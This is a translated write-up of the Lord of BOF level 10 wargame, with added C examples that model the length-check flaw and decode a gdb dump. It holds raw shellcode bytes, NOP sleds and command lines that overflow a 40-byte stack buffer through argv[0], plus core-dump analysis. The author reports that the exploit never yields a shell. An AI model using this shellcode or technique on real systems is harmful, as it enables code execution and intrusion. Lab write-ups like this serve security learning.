
[BOF-Wargames] LOB Lord of BOF LEVEL10 (Vampire -> Skeleton) write-up

by 깝태 2011. 9. 4.

--------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level10 [ Vampire -> Skeleton ] 
--------------------------------------------------------------------------------------------------------------------------
[vampire@localhost vampire]$ ls
skeleton  skeleton.c

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc; // a new one has appeared!

        if(argc < 2){
                printf("argv error\n"); // you must pass at least two arguments
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++) // wipes the environment variables
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf') // forbids RTL (return-to-libc)
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){ // length limit on argv[1]
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc; // saves argc into the saved_argc variable

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40); // wipes the buffer

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i])); // a mighty one that wipes every argument -_____- ;
        return 0;
}
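The defect in skeleton.c is the bound itself: `buffer` holds 40 bytes, but the length check only rejects arguments longer than 48, so up to eight bytes past the buffer are still copied by `strcpy`. The following is an added example (not part of skeleton.c or the LOB challenge) that models main()'s 32-bit frame as a struct and compares the original bound with one derived from `sizeof buffer`; the struct layout (buffer, saved ebp, return address) is an assumption mirroring the frame this write-up targets, and the 'A'-filled inputs are constructed test data.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from skeleton.c: model of main()'s frame on this
 * 32-bit binary (assumed layout: buffer, then saved ebp, then return
 * address), so the effect of each bound can be observed safely. */
#define BUF_SZ 40

struct frame_model {
    char buffer[BUF_SZ];
    unsigned char saved_ebp[4];
    unsigned char ret_addr[4];
};

/* The predicate skeleton.c uses: accepts any argument up to 48 bytes. */
int original_check_accepts(const char *arg)
{
    return strlen(arg) <= 48;
}

/* Hardened predicate: the argument plus its NUL must fit inside the buffer. */
int hardened_check_accepts(const char *arg)
{
    return strlen(arg) < BUF_SZ;
}

/* Bounds-checked replacement for the strcpy() in skeleton.c.
 * Returns 0 on success, -1 (copying nothing) if src does not fit in dst. */
int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (len >= dstsz) return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Reproduce strcpy()'s behaviour inside the model (strlen+1 bytes, no bound,
 * capped at the model's size so the demo stays well-defined) and report
 * whether any byte landed in the return-address slot. */
int model_copy_hits_ret(struct frame_model *f, const char *arg)
{
    size_t n = strlen(arg) + 1;
    memset(f, 0, sizeof *f);
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, arg, n);
    for (int i = 0; i < 4; i++)
        if (f->ret_addr[i] != 0) return 1;
    return 0;
}

/* Constructed test input: n bytes of 'A' (max 63), NUL-terminated. */
const char *sample_arg(size_t n)
{
    static char buf[64];
    if (n > sizeof buf - 1) n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Does an n-byte argument that passes the original check reach the
 * return-address slot in the model? */
int overflow_reaches_ret(size_t n)
{
    struct frame_model f;
    const char *arg = sample_arg(n);
    if (!original_check_accepts(arg)) return 0;
    return model_copy_hits_ret(&f, arg);
}

/* Does copy_arg_checked() accept an n-byte argument into a 40-byte buffer? */
int checked_copy_accepts(size_t n)
{
    char buffer[BUF_SZ];
    return copy_arg_checked(buffer, sizeof buffer, sample_arg(n)) == 0;
}

int main(void)
{
    size_t lens[] = { 39, 40, 44, 48, 49 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        const char *arg = sample_arg(lens[i]);
        printf("len %2zu: original=%d hardened=%d reaches_ret=%d\n",
               lens[i], original_check_accepts(arg),
               hardened_check_accepts(arg), overflow_reaches_ret(lens[i]));
    }
    return 0;
}
```

The wiping of `environ`, `buffer` and `argv` in skeleton.c does nothing about this: those loops only clear data after the copy has already happened, and the frame model shows that a 48-byte argument passes the original check while a check against the buffer's real size rejects anything of 40 bytes or more.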

A truly filthy one, as the name says: it wipes every argument.
How do we attack it... Looking at it, argv[0] has the peculiar property that when the program runs,
its residue ends up at the top of the stack. So, just like with troll, we put NOPs and shellcode into argv[0],
but instead of locating it from the source we analyze it directly with GDB and return to the top.

Let's check what residue is sitting at the top.

[vampire@localhost xodnr]$ ./skeleton aa
stack is still your friend.

[vampire@localhost xodnr]$ ulimit -c unlimited

[vampire@localhost xodnr]$ ./skeleton `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ gdb -q skeleton core
Core was generated by `                                                           '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/50x $esp
0xbffffb30:     0x00000000      0xbffffb74      0xbffffb80      0x40013868
0xbffffb40:     0x00000002      0x08048450      0x00000000      0x08048471
0xbffffb50:     0x08048500      0x00000002      0xbffffb74      0x08048390
0xbffffb60:     0x080486ac      0x4000ae60      0xbffffb6c      0x40013e90
0xbffffb70:     0x00000002      0xbffffc66      0xbffffc71      0x00000000
0xbffffb80:     0xbffffca2      0xbffffcc4      0xbffffcce      0xbffffcdc
0xbffffb90:     0xbffffcfb      0xbffffd0b      0xbffffd24      0xbffffd41
0xbffffba0:     0xbffffd4c      0xbffffd5a      0xbffffd9d      0xbffffdb0
0xbffffbb0:     0xbffffdc5      0xbffffdd5      0xbffffde2      0xbffffe01
0xbffffbc0:     0xbffffe0c      0xbffffe19      0xbffffe21      0xbfffffe4
0xbffffbd0:     0x00000000      0x00000003      0x08048034      0x00000004
0xbffffbe0:     0x00000020      0x00000005      0x00000006      0x00000006
0xbffffbf0:     0x00001000      0x00000007

(gdb)
0xbffffbf8:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffc08:     0x08048450      0x0000000b      0x000001fd      0x0000000c
0xbffffc18:     0x000001fd      0x0000000d      0x000001fd      0x0000000e
0xbffffc28:     0x000001fd      0x00000010      0x0fe9fbff      0x0000000f
0xbffffc38:     0xbffffc61      0x00000000      0x00000000      0x00000000
0xbffffc48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc58:     0x00000000      0x00000000      0x38366900      0x00000036
0xbffffc68:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc78:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffca8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcb8:     0x00000000      0x00000000

(gdb)
0xbffffcc0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffce0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcf0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd00:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd10:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd20:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd30:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd70:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd80:     0x00000000      0x00000000

(gdb)
0xbffffd88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffda8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdc8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdd8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffde8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdf8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe48:     0x00000000      0x00000000

(gdb)
0xbffffe50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe70:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe90:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffea0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffeb0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffec0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffed0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffee0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffef0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff00:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff10:     0x00000000      0x00000000

(gdb)
0xbfffff18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff58:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff68:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff78:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffa8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffc8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffd8:     0x00000000      0x00000000

(gdb)
0xbfffffe0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffff0:     0x732f2e00      0x656c656b      0x006e6f74      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

A little residue remains at the very end; that part is said to be the file name, the argv[0] part,
but I'm not exactly sure why. Anyway, the plan is to exploit it through argv[0], and I'll attack
as with the previous payload.
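The residue at the end of the dump is readable once the words are decoded. As an added example (not code from the write-up), here is a small C decoder for gdb `x/Nx` output: it reads each 32-bit word as little-endian bytes, concatenates them in address order and extracts printable runs. Run on the last two dump lines above (embedded here as constructed input, copied from the write-up), it recovers `./skeleton` at 0xbffffff1. That is the pathname passed to execve(): on Linux the kernel copies it to the top of the new process stack, above the environment strings, which is why neither the environ loop nor the argv loop in skeleton.c can reach it. The lesson for anyone treating "clear the inputs afterwards" as a defense is that only the bounds check on the copy itself removes the bug.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Added example, not from the write-up: decode gdb "x/Nx" dump lines back
 * into bytes and pull out printable strings. The sample is the last two dump
 * lines of the write-up plus gdb's trailing error line, embedded as
 * constructed input so the program runs offline. */
static const char SAMPLE_DUMP[] =
    "0xbfffffe0:     0x00000000      0x00000000      0x00000000      0x00000000\n"
    "0xbffffff0:     0x732f2e00      0x656c656b      0x006e6f74      0x00000000\n"
    "0xc0000000:     Cannot access memory at address 0xc0000000\n";

/* Parse the "0xWORD 0xWORD ..." part of one dump line (the text after the
 * colon) into bytes. Each word is a 32-bit little-endian value, so its lowest
 * byte is the one at the lowest address. Stops at the first non-hex token
 * (e.g. "Cannot access memory" or the newline). Returns bytes written. */
size_t words_to_bytes(const char *p, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    while (n + 4 <= outsz) {
        char *end;
        unsigned long w;
        while (*p == ' ' || *p == '\t') p++;
        if (strncmp(p, "0x", 2) != 0) break;
        w = strtoul(p, &end, 16);
        if (end == p) break;
        p = end;
        for (int i = 0; i < 4; i++)
            out[n++] = (unsigned char)((w >> (8 * i)) & 0xff);
    }
    return n;
}

/* Decode a multi-line dump into one contiguous byte buffer. Stores the
 * address of the first line in *base. Returns the total bytes decoded. */
size_t dump_to_bytes(const char *dump, unsigned char *out, size_t outsz,
                     unsigned long *base)
{
    size_t total = 0;
    const char *line = dump;
    *base = strtoul(dump, NULL, 16);
    while (*line && total < outsz) {
        const char *nl = strchr(line, '\n');
        const char *colon = strchr(line, ':');
        if (colon && (!nl || colon < nl))      /* only lines shaped "ADDR: ..." */
            total += words_to_bytes(colon + 1, out + total, outsz - total);
        if (!nl) break;
        line = nl + 1;
    }
    return total;
}

/* Find the first run of at least minlen printable bytes and copy it to out.
 * Returns the run's offset in buf, or -1 if there is none. */
long first_string(const unsigned char *buf, size_t n, size_t minlen,
                  char *out, size_t outsz)
{
    size_t start = 0, run = 0;
    for (size_t i = 0; i <= n; i++) {
        if (i < n && isprint(buf[i])) {
            if (run == 0) start = i;
            run++;
        } else {
            if (run >= minlen) {
                if (run >= outsz) run = outsz - 1;
                memcpy(out, buf + start, run);
                out[run] = '\0';
                return (long)start;
            }
            run = 0;
        }
    }
    return -1;
}

/* Decode SAMPLE_DUMP; returns 0 and fills out/addr on success, -1 otherwise. */
int decode_sample(char *out, size_t outsz, unsigned long *addr)
{
    unsigned char bytes[256];
    unsigned long base;
    size_t n = dump_to_bytes(SAMPLE_DUMP, bytes, sizeof bytes, &base);
    long off = first_string(bytes, n, 4, out, outsz);
    if (off < 0) return -1;
    *addr = base + (unsigned long)off;
    return 0;
}

/* Thin wrappers so each result can be checked on its own. */
const char *residue_string(void)
{
    static char str[128];
    unsigned long addr;
    if (decode_sample(str, sizeof str, &addr) != 0) str[0] = '\0';
    return str;
}

unsigned long residue_address(void)
{
    char str[128];
    unsigned long addr = 0;
    decode_sample(str, sizeof str, &addr);
    return addr;
}

int main(void)
{
    printf("%#lx: \"%s\"\n", residue_address(), residue_string());
    return 0;
}
```

The same decoder works on any block of `x/Nx` output pasted into `SAMPLE_DUMP`, so it can be used to read back other regions of a core dump without hand-converting words one at a time.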

[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost xodnr]$ ll
total 84
-rw-------    1 vampire  vampire     61440 Aug 27 21:13 core
-rwxrwxr-x    1 vampire  vampire     12752 Aug 27 21:10 skeleton
-rw-r--r--    1 vampire  vampire       821 Aug 27 21:10 skeleton.c
lrwxrwxrwx    1 vampire  vampire         8 Aug 27 21:21 ????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î? -> skeleton

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xfe\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿þÿÿ¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xf0\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ðÿÿ¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'`

[vampire@localhost xodnr]$ ./`python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'` `python -c 'print "\x90"*44 + "\x26\xfc\xff\xbf"'`
&üÿ¿
Segmentation fault (core dumped)

But no matter how many times I tried, no shell came up, so I checked the core, and the payload is in there correctly.

(gdb)
0xbfffff68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffc8:     0xeb909090      0xc9315e11      0x6c8032b1      0x8001ff0e
0xbfffffd8:     0xf67501e9      0xeae805eb      0x32ffffff      0x306951c1
0xbfffffe8:     0x69697430      0x6f6a6330      0x5451e48a      0xb19ae28a
0xbffffff8:     0x0081ce0c      0x00000000      Cannot access memory at address 0xc0000000

So even after jumping to the address above, the shell wouldn't spawn, and I tried a short shellcode, but it still didn't. ㅠ;
Strangely, I just can't get the shell. I'll definitely come back and solve this one later.